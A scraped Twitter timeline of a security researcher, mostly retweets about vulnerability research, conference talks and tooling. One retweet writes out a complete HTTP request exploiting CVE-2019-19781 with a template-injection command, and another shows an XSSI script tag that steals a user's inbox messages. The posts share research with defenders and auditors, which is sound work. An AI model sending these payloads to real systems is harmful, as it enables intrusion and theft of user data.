- BTW this is from @maxientuiter, follow him for more amazing content :)
- [Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step: https://medium.com/@maxi./finding-and-exploiting-cve-2018-7445-f3103f163cc1 …
- Leandro Barragan Retweeted
  Give a man an 0day and he'll have access for a day, teach a man to phish and he'll have access for life.
- Leandro Barragan Retweeted
  I just published a ~45 page whitepaper on attacking and defending terraform infrastructure as code in GitHub. Includes attack scenarios, hardening, detections, etc. Deep thanks to @tifkin_ and @harmj0y for their inspiration and research.
  https://www.sans.org/reading-room/whitepapers/securecode/defending-infrastructure-code-github-enterprise-39380 …
  1/3
- Leandro Barragan Retweeted
  Apply for a position as a Senior Security Consultant with Immunity at our HQ in Miami, Florida or Arlington, Virginia. https://www.immunityinc.com/careers/
- Leandro Barragan Retweeted
  For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
- Just include that js view on your site and you will get all the user's e-mails: <div id="messages" class="messages"></div><script src="https://victim/messages/inbox?format=js"></script>
- For example, this is a template file that renders an application/javascript response with all the messages in the user's inbox: $("#messages").html('<%=j render("messages") %>');
- When auditing Ruby on Rails apps, always search for <name>.js.erb views files. There is a stupid pattern called "Server-generated JavaScript Responses" which is a way to bypass SOP and inject content via JavaScript files (just like JSONP) which leads to XSSI.
- Leandro Barragan Retweeted
  Unpopular opinion: VDPs should not have any rewards of any kind -- no rep/kudos, no swag. Any reward just incentivizes people to hunt on them, devaluing hackers' time, especially new hackers. They should be pure "see something, say something".
- Leandro Barragan Retweeted
  If you want to understand how this is possible, come tomorrow at @BlackHatEvents #BHEU Location: Room D Date: Thursday, December 5 | 10:45am-11:35am https://www.blackhat.com/eu-19/briefings/schedule/index.html#unveiling-the-underground-world-of-anti-cheats-17358 … pic.twitter.com/yglag9yTfz
- Leandro Barragan Retweeted
  "I felt a great disturbance in the Force, as if millions of AWS SSRF vulnerabilities suddenly cried out in terror and were suddenly silenced. I fear something terrible has happened." https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/ …
- Leandro Barragan Retweeted
  A Tale of Exploitation in Spreadsheet File Conversions - Researching exploitation in headless document conversion in LibreOffice w/ @erbbysam, @Smiegles, @Daeken https://buer.haus/2019/10/18/a-tale-of-exploitation-in-spreadsheet-file-conversions/ … pic.twitter.com/lwPkzfwRy0
- Leandro Barragan Retweeted
  In #BHEU Briefing @niemand_sec will explain the state of the anti-cheat software market designed to protect gaming software and details various bypass techniques http://ow.ly/fHxI50wDDcb
- Leandro Barragan Retweeted
  When confronted with a coding problem, one programmer thought, 'I know, I'll use threads' - and then two he hd aerpoblms
- Leandro Barragan Retweeted
  #eko15 talks
  The recipe from @6e726d and @LautaroFain has everything for success: hardware, firmware and freshly soldered tin.
  #Eko15 talks!
  This recipe has all it takes for success: hardware, firmware, and freshly welded pewter
  INFO https://bit.ly/2mawTid pic.twitter.com/a4sfPOQ5ex
- Leandro Barragan Retweeted
  https://www.zoomeye.org/searchResult?q=%27%3Cp%20hidden%3D%22hidden%22%27 … This honeypot system looks very popular right now, and ZoomEye's honeypot recognition service can cover this type. https://twitter.com/bad_packets/status/1154248626333339648 … pic.twitter.com/e5dtJxJutX
- Leandro Barragan Retweeted
  Nowadays you even need to be careful even with malicious monitors X) Nice Linux Kernel finding from @taviso based on @semmle QL results from @nicowaisman and @pavgustinov Report: https://www.openwall.com/lists/oss-security/2019/07/19/2 … Query: https://lgtm.com/query/4659751768427255775/ …
- Leandro Barragan Retweeted
  And I just merged @_dirkjan's code to exploit CVE-2019-1040 (MIC Remove) using ntlmrelayx.py. Great stuff! https://github.com/SecureAuthCorp/impacket/pull/637 …